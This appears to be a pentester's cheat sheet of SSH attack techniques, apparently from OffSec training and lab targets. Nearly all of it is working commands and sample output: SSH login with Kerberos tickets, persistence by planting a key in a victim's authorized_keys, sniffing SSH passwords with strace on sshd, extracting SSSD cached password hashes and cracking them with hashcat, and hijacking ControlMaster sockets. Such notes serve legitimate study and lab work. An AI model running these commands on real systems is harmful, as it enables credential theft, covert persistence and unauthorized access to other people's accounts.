SSH Login with ccache
ssh -K leivy@klendathu.vl@srv2.klendathu.vl
kinit Rosie.powell
kvno host/frajmp.HERON.VL
ssh -K svc-web-accounting@HERON.VL@frajmp.HERON.VL
SSH persistence
On client machine
ssh-keygen
On victim machine
echo "ssh-rsa AAAAB3NzaC1yc2E....ANSzp9EPhk4cIeX8= kali@kali" >> /home/linuxvictim/.ssh/authorized_keys
On client machine
ssh linuxvictim@linuxvictim
Sniffing SSH password as root
pgrep -l sshd
strace -f -p 633 -e trace=write -o capture633
cat capture633
ssh cached credentials as root
we can get the stored passwords from /var/lib/sss/db/cache_vigilant.vl
strings cache_vigilant.vl.ldb | grep -B 14 -A 2 cachedPassword | tee hashes.txt
grep '\$' hashes.txt | sort -u | uniq .\hashcat.exe -m 1800 -o ..\cracked.txt ..\hashes.txt ..\rockyou.txt
SSH Hijacking
ls -al ~/.ssh/controlmaster/
ssh offsec@linuxvictim
In the second scenario, we’re logged in as a root user (or someone with sudo privileges). In this case, we return to our Kali VM and this time, we’ll log in to the controller VM as root instead of offsec.
From here, we can hijack the open SSH socket using the SSH client’s -S parameter, which specifies a socket.
root@controller:~# ls -al /home/offsec/.ssh/controlmaster
total 8
drwxrwxr-x 2 offsec offsec 4096 May 13 16:22 .
drwx------ 3 offsec offsec 4096 May 13 13:55 ..
srw------- 1 offsec offsec
0 May 13 16:22 offsec@linuxvictim:22
root@controller:~# ssh -S /home/offsec/.ssh/controlmaster/offsec\@linuxvictim\:22 offsec@linuxvictim
Last login: Wed May 13 16:22:08 2020 from 192.168.120.40
offsec@linuxvictim:~$
ssh -S /root/.ssh/controlmaster/florence.ramirez@ghost.htb@dev-workstation:22 florence.ramirez@dev-workstation